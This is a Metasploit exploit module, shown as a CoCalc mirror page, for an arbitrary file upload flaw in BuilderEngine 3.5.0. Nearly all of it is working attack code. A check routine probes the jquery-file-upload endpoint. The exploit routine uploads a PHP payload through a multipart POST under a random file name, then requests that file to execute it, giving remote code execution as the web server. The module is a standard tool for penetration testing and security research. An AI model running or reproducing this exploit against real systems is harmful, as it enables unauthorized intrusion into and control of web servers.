CoCalc -- builderengine_upload

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/builderengine_upload_exec.rb
³²⁵⁴⁵ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::FileDropper
10
  include Msf::Exploit::Remote::HttpClient
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "BuilderEngine Arbitrary File Upload Vulnerability and execution",
17
        'Description' => %q{
18
          This module exploits a vulnerability found in BuilderEngine 3.5.0
19
          via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious
20
          file, which would result in arbitrary remote code execution under the context of
21
          the web server.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'metanubix', # PoC
26
          'Marco Rivoli' # Metasploit
27
        ],
28
        'References' => [
29
          ['CVE', '2025-34100'],
30
          ['EDB', '40390']
31
        ],
32
        'Payload' => {
33
          'BadChars' => "\x00"
34
        },
35
        'DefaultOptions' => {
36
          'EXITFUNC' => 'thread'
37
        },
38
        'Platform' => ['php'],
39
        'Arch' => ARCH_PHP,
40
        'Targets' => [
41
          ['BuilderEngine 3.5.0', {}]
42
        ],
43
        'Privileged' => false,
44
        'DisclosureDate' => '2016-09-18',
45
        'DefaultTarget' => 0,
46
        'Notes' => {
47
          'Reliability' => UNKNOWN_RELIABILITY,
48
          'Stability' => UNKNOWN_STABILITY,
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
        }
51
      )
52
    )
53

54
    register_options(
55
      [
56
        OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])
57
      ]
58
    )
59
  end
60

61
  def check
62
    uri = target_uri.path
63
    uri << '/' if uri[-1, 1] != '/'
64

65
    res = send_request_cgi({
66
      'method' => 'GET',
67
      'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')
68
    })
69

70
    if res && res.code == 200 && !res.body.blank?
71
      return Exploit::CheckCode::Appears
72
    else
73
      return Exploit::CheckCode::Safe
74
    end
75
  end
76

77
  def exploit
78
    uri = target_uri.path
79

80
    peer = "#{rhost}:#{rport}"
81
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
82
    data = Rex::MIME::Message.new
83
    payload_encoded = Rex::Text.rand_text_alpha(1)
84
    payload_encoded << "<?php "
85
    payload_encoded << payload.encoded
86
    payload_encoded << " ?>\r\n"
87
    data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
88
    post_data = data.to_s
89

90
    res = send_request_cgi({
91
      'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),
92
      'method' => 'POST',
93
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
94
      'data' => post_data
95
    })
96

97
    if res
98
      if res.code == 200 && res.body =~ /files|#{php_pagename}/
99
        print_good("Our payload is at: #{php_pagename}. Calling payload...")
100
        register_file_for_cleanup(php_pagename)
101
      else
102
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
103
      end
104
    else
105
      fail_with(Failure::Unknown, 'ERROR')
106
    end
107

108
    print_status("Calling payload...")
109
    send_request_cgi(
110
      'method' => 'GET',
111
      'uri' => normalize_uri(uri, 'files/', php_pagename)
112
    )
113
  end
114
end
115

116
Product

Resources

Company
